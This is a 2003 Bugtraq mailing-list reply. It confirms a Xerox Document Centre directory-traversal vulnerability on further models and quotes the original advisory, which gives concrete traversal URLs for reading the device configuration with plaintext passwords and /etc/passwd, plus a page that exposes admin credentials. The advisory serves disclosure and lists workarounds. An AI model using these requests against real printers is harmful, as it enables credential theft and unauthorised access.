Re: Security bug in Xerox Document Centre

From: brandon pierce (brandonp_at_insynclh.com)
Date: 12/20/03

  • Next message: Andrew Daviel: "Multicast from Orinoco wireless stations"
    Date: 20 Dec 2003 00:02:06 -0000
    To: bugtraq@securityfocus.com
    
    
    ('binary' encoding is not supported, stored as-is) In-Reply-To: <20031219141657.A1147@shiva.cps.unizar.es>

    Just tested this out on a few different models of Xerox multifunction devices of ours as well, and all three were vulnerable. Following systems apply:

    Document Centre 440DC
    Document Centre 480DC
    Document Centre 425ST

    >TECHNICAL INFO
    >===============================================================================
    >
    >Vulnerable systems
    >- --------------------------------------------------------------
    >
    > Xerox Document Centre 470, 255ST and maybe others.
    > Software : Xerox_MicroServer
    > Version : Xerox11 0.19.5.509
    > OS : LynxOS:E2.1_SMP.063.1:02/13/2003
    >
    >
    >Impact
    >- -----------------------------------------
    >
    >
    > Remote access to files.
    > Access to plaintext passwords for the http administration interface.
    > Access to DES passwords for the operating system.
    > Read-write access to http users and passwords
    >
    >
    >Details
    >- --------------------------------------------------------------
    >
    > Web server software (self-reports as "Xerox_MicroServer/Xerox11")
    > for Xerox hardware will return a binary dump of directories when
    > the requested URL ends with "/.." or "/."; so you can build easily
    > the directory/file tree from document root and get every file.
    >
    > At first, you can't get back past document root, since httpd seems
    > to reject "../" if it would climb back too much:
    >
    >
    > GET /../.. -> "The request had invalid syntax."
    >
    > But it does accept "../":
    >
    > GET /assist/.. -> OK
    >
    > So maybe it just counts "../" groups and compares the count
    > to the total number of "/" ? Let's try:
    >
    > GET /assist/////.././../../. -> OK
    >
    >
    >
    > Examples:
    >
    > - http://xerox_dc_470.example.com/..
    >
    >
    >00 00 00 00 45 00 0c 00 01 2e 00 00 00 00 00 00 43 ...E...........C
    >10 00 0c 00 02 2e 2e 00 00 00 00 00 46 00 10 00 06 ...........F....
    >20 63 6f 6e 66 69 67 00 00 00 00 00 48 00 10 00 06 config.....H....
    >30 68 74 64 6f 63 73 00 00 00 00 02 26 00 10 00 04 htdocs.....&....
    >40 6a 6f 62 73 00 00 00 00 00 00 02 29 01 b8 00 04 jobs.......)....
    >50 6c 61 6e 67 00 00 00 00 00 00 00 00 00 00 00 00 lang............
    >60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
    >
    > - http://xerox_dc_470.example.com////../../data/config/microsrv.cfg
    >
    > and you get full configuration, including plain text passwords.
    >
    > - http://xerox_dc_470.example.com////////../../../../../../etc/passwd
    >
    > and you get a passwd file to run crack on
    >
    >
    > Even without having to use ".." you can get the plain text passwords
    > for the HTTP interface using
    >
    > http://xerox_dc_470.example.com/srvadmin/usersecure.dhtml
    >
    > From that page, you can even create new users; when you press
    > "Apply new settings" button prompts for admin password (the
    > same you just have read in that same page)
    >
    >
    > Probably you could use this to steal documents from the printer
    > queue, but I haven't verified this.
    >
    >
    > Note: to test this vulnerability do not use any "smart" http client
    > which will rewrite the URL internally to suppress '../' parts.
    >
    >
    >
    >Workaround
    >- ---------------------------------------------------------------------
    >
    > - Disable http interface.
    > - Restrict access permissions to trusted hosts
    >
    >===============================================================================
    >
    >
    >--
    >finger spd@shiva.cps.unizar.es for PGP /
    >.mailcap tip of the day: / La vida es una carcel
    >application/ms-tnef; cat '%s' > /dev/null / con las puertas abiertas
    >text/x-vcard; cat '%s' > /dev/null / (A. Calamaro)
    >


  • Next message: Andrew Daviel: "Multicast from Orinoco wireless stations"